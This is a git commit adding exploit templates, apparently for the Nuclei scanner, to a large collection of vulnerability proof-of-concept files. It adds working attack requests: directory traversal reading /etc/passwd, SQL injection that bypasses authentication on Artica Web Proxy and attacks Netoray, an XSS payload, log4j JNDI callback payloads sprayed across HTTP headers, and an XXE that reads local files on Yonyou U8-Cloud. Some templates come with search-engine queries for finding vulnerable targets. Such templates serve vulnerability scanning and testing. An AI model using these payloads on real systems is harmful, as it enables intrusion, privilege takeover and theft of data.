20240701

adysec · Jul 1, 2024 · 8d5b7db · 8d5b7db
1 parent 069166f
commit 8d5b7db
Show file tree

Hide file tree

Showing 9 changed files with 263 additions and 1 deletion.
diff --git a/date.txt b/date.txt
@@ -1 +1 @@
-20240630
+20240701
diff --git a/poc.txt b/poc.txt
@@ -40498,6 +40498,7 @@
 ./poc/cve/cve-2015-4414-2530.yaml
 ./poc/cve/cve-2015-4414-2531.yaml
 ./poc/cve/cve-2015-4414-2532.yaml
+./poc/cve/cve-2015-4414.yaml
 ./poc/cve/cve-2015-4632-2533.yaml
 ./poc/cve/cve-2015-4632-2534.yaml
 ./poc/cve/cve-2015-4632-2535.yaml
@@ -43042,6 +43043,7 @@
 ./poc/cve/cve-2020-17506-4681.yaml
 ./poc/cve/cve-2020-17506-4682.yaml
 ./poc/cve/cve-2020-17506-4683.yaml
+./poc/cve/cve-2020-17506.yaml
 ./poc/cve/cve-2020-17518-4684.yaml
 ./poc/cve/cve-2020-17518-4685.yaml
 ./poc/cve/cve-2020-17518-4686.yaml
@@ -45222,6 +45224,7 @@
 ./poc/cve/cve-2021-42565-6511.yaml
 ./poc/cve/cve-2021-42565-6512.yaml
 ./poc/cve/cve-2021-42565-6513.yaml
+./poc/cve/cve-2021-42565.yaml
 ./poc/cve/cve-2021-42566-1(1).yaml
 ./poc/cve/cve-2021-42566-2(1).yaml
 ./poc/cve/cve-2021-42566-6514.yaml
@@ -51629,6 +51632,7 @@
 ./poc/header/insert-headers-and-footers.yaml
 ./poc/header/jenkins-headers-detect.yaml
 ./poc/header/jfrog-version-header.yaml
+./poc/header/log4j-all-headers.yaml
 ./poc/header/log4j-header.yaml
 ./poc/header/maxforwards-headers-detect.yaml
 ./poc/header/missing-hsts-header.yaml
@@ -98129,6 +98133,7 @@
 ./poc/sql/nd-shortcodes-1df3ea9dadde70dead5b7fe3f433db07.yaml
 ./poc/sql/nd-shortcodes-59ae582069dfefb7ecef9bedbd9caeab.yaml
 ./poc/sql/nd-shortcodes-f29dbb12c2996c2a86af0c78d896fbe5.yaml
+./poc/sql/netoray-sqli.yaml
 ./poc/sql/netwin-dbabble.yaml
 ./poc/sql/neuvoo-jobroll-7575942edfc25ccc362dbf6031c222eb.yaml
 ./poc/sql/new-order-notification-for-woocommerce-49439a7e50ee67cd1bb7eb21dbcf870f.yaml
@@ -100957,6 +100962,7 @@
 ./poc/sql_injection/mysqldumper.yaml
 ./poc/sql_injection/mysqlman.yaml
 ./poc/sql_injection/mywebsql.yaml
+./poc/sql_injection/netoray-sqli.yaml
 ./poc/sql_injection/niushop-sqli.yaml
 ./poc/sql_injection/notificationx-sqli.yaml
 ./poc/sql_injection/oa8000-workflowservice-sql-inject.yaml
@@ -111472,6 +111478,7 @@
 ./poc/xml_external_entity/yongyou-ufida-oa-uapws-xxe.yaml
 ./poc/xml_external_entity/yongyou_soapFormat_xxe.yaml
 ./poc/xml_external_entity/yongyou_xxe.yaml
+./poc/xml_external_entity/yonyou-u8-cloud-showRPCLoadingTip-xxe.yaml
 ./poc/xml_external_entity/yonyou-u8-cloud-xchangeservlet-xxe.yaml
 ./poc/xml_external_entity/yonyou-u8cloud-hrss-xxe.yaml
 ./poc/xml_external_entity/yonyou_EHR-xxe-smartweb2.yaml

diff --git a/poc/cve/cve-2015-4414.yaml b/poc/cve/cve-2015-4414.yaml
@@ -0,0 +1,35 @@
+id: CVE-2015-4414
+
+info:
+  name: WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal
+  author: daffainfo
+  severity: high
+  description: WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
+  reference:
+    - https://www.exploit-db.com/exploits/37274
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-4414
+    - https://www.exploit-db.com/exploits/37274/
+    - http://packetstormsecurity.com/files/132266/WordPress-SE-HTML5-Album-Audio-Player-1.1.0-Directory-Traversal.html
+  classification:
+    cve-id: CVE-2015-4414
+  metadata:
+    google-query: inurl:"/wp-content/plugins/se-html5-album-audio-player"
+  tags: cve,cve2015,wordpress,wp-plugin,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/06/08
diff --git a/poc/cve/cve-2020-17506.yaml b/poc/cve/cve-2020-17506.yaml
@@ -0,0 +1,42 @@
+id: CVE-2020-17506
+
+info:
+  name: Artica Web Proxy 4.30 Authentication Bypass
+  author: dwisiswant0
+  severity: critical
+  description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
+
+  # Artica Web Proxy 4.30.00000000
+  # allows remote attacker to bypass privilege detection
+  # and gain web backend administrator privileges
+  # through SQL injection of the apikey parameter in fw.login.php.
+  # -
+  # References:
+  # > https://blog.max0x4141.com/post/artica_proxy/
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
+    redirects: true
+    max-redirects: 1
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "artica-applianc"
+      - type: status
+        status:
+          - 200
+          - 301
+          - 302
+        condition: or
+      - type: word
+        name: session
+        words:
+          - "PHPSESSID"
+        part: header
+    extractors:
+      - type: kval
+        kval:
+          - "PHPSESSID"
diff --git a/poc/cve/cve-2021-42565.yaml b/poc/cve/cve-2021-42565.yaml
@@ -0,0 +1,41 @@
+id: CVE-2021-42565
+
+info:
+  author: madrobot
+  name: myfactory FMS  -  Reflected Cross-Site Scripting
+  severity: medium
+  description: myfactory.FMS before 7.1-912 allows cross-site scripting via the UID parameter.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-42565
+    - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2021-42565
+    cwe-id: CWE-79
+  tags: cve,cve2021,myfactory,xss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+      - '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+# Enhanced by mp on 2022/02/27
diff --git a/poc/header/log4j-all-headers.yaml b/poc/header/log4j-all-headers.yaml
@@ -0,0 +1,55 @@
+id: log4j-fuzz-head-poc
+
+info:
+  name: log4j-rce漏洞
+  author: xxx
+  severity: critical
+  tags: apache,rce
+
+requests:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        {{log4j_payloads}}
+
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        {{log4j_payloads}}
+    payloads:
+      log4j_payloads:
+        - 'X-Client-IP: ${jndi:ldap://{{interactsh-url}}/info}'
+        - 'X-Remote-IP: ${jndi:ldap://{{interactsh-url}}/info}'
+        - 'X-Remote-Addr: ${jndi:ldap://{{interactsh-url}}/info}'
+        - 'X-Forwarded-For: ${jndi:ldap://{{interactsh-url}}/info}'
+        - 'X-Originating-IP: ${jndi:ldap://{{interactsh-url}}/info}'
+        - 'User-Agent: ${jndi:ldap://{{interactsh-url}}/info}'
+        - 'Referer: ${jndi:ldap://{{interactsh-url}}/info}'
+        - 'CF-Connecting_IP: ${jndi:ldap://{{interactsh-url}}/info}'
+        - 'True-Client-IP: ${jndi:ldap://{{interactsh-url}}/info}'
+        - 'X-Forwarded-For: ${jndi:ldap://{{interactsh-url}}/info}'
+        - 'Originating-IP: ${jndi:ldap://{{interactsh-url}}/info}'
+        - 'X-Real-IP: ${jndi:ldap://{{interactsh-url}}/info}'
+        - 'X-Client-IP: ${jndi:ldap://{{interactsh-url}}/info}'
+        - 'Forwarded: ${jndi:ldap://{{interactsh-url}}/info}'
+        - 'Client-IP: ${jndi:ldap://{{interactsh-url}}/info}'
+        - 'Contact: ${jndi:ldap://{{interactsh-url}}/info}'
+        - 'X-Wap-Profile: ${jndi:ldap://{{interactsh-url}}/info}'
+        - 'X-Api-Version: ${jndi:ldap://{{interactsh-url}}/info}'
+        - 'Host: ${jndi:ldap://{{interactsh-url}}/info}'
+
+    attack: clusterbomb
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        name: http
+        words:
+          - "http"
+
+      - type: word
+        part: interactsh_protocol
+        name: dns
+        words:
+          - "dns"
diff --git a/poc/sql/netoray-sqli.yaml b/poc/sql/netoray-sqli.yaml
@@ -0,0 +1,24 @@
+id: Netoray-sqli
+
+info:
+  name: Netoray上网行为管理系统sql注入漏洞
+  author: Str1am
+  severity: high
+  reference: http://www.anquan.us/static/bugs/wooyun-2016-0171547.html
+  tags: Netoray,sqli
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/bottomframe.cgi?user_name='))%20union%20select%20md5(1)%23where%20name%3d'superadmin'%23"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "c4ca4238a0b923820dcc509a6f75849b"
+        part: body
+        condition: and
diff --git a/poc/sql_injection/netoray-sqli.yaml b/poc/sql_injection/netoray-sqli.yaml
@@ -0,0 +1,24 @@
+id: Netoray-sqli
+
+info:
+  name: Netoray上网行为管理系统sql注入漏洞
+  author: Str1am
+  severity: high
+  reference: http://www.anquan.us/static/bugs/wooyun-2016-0171547.html
+  tags: Netoray,sqli
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/bottomframe.cgi?user_name='))%20union%20select%20md5(1)%23where%20name%3d'superadmin'%23"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "c4ca4238a0b923820dcc509a6f75849b"
+        part: body
+        condition: and
diff --git a/poc/xml_external_entity/yonyou-u8-cloud-showRPCLoadingTip-xxe.yaml b/poc/xml_external_entity/yonyou-u8-cloud-showRPCLoadingTip-xxe.yaml
@@ -0,0 +1,34 @@
+id: yonyou-u8-cloud-showRPCLoadingTip-xxe
+
+info:
+  name: Ufida U8-Cloud smartweb2.showRPCLoadingTip.d XXE
+  author: Co5mos
+  severity: critical
+  description: |
+    用友U8-Cloud `smartweb2.showRPCLoadingTip.d` 接口存在XXE漏洞，攻击者可以利用此漏洞读取服务器上的任意文件。
+  metadata:
+    fofa-query: app="用友-U8-Cloud"
+  tags: xxe, ufida, cloud
+
+http:
+  - raw:
+    - |
+      POST /hrss/dorado/smartweb2.showRPCLoadingTip.d?skin=default&__rpc=true&windows=1 HTTP/1.1
+      Host: {{Hostname}}
+      Content-Type: application/x-www-form-urlencoded
+
+      __type=updateData&__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=%3C%21DOCTYPE+z+%5B%3C%21ENTITY+test++SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%5D%3E%3Crpc+transaction%3D%221%22+method%3D%22resetPwd%22%3E%3Cdef%3E%3Cdataset+type%3D%22Custom%22+id%3D%22dsResetPwd%22%3E%3Cf+name%3D%22user%22%3E%3C%2Ff%3E%3C%2Fdataset%3E%3C%2Fdef%3E%3Cdata%3E%3Crs+dataset%3D%22dsResetPwd%22%3E%3Cr+id%3D%221%22+state%3D%22insert%22%3E%3Cn%3E%3Cv%3E1%3C%2Fv%3E%3C%2Fn%3E%3C%2Fr%3E%3C%2Frs%3E%3C%2Fdata%3E%3Cvps%3E%3Cp+name%3D%22__profileKeys%22%3E%26test%3B%3C%2Fp%3E%3C%2Fvps%3E%3C%2Frpc%3E
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and
+
+      - type: status
+        status:
+          - 200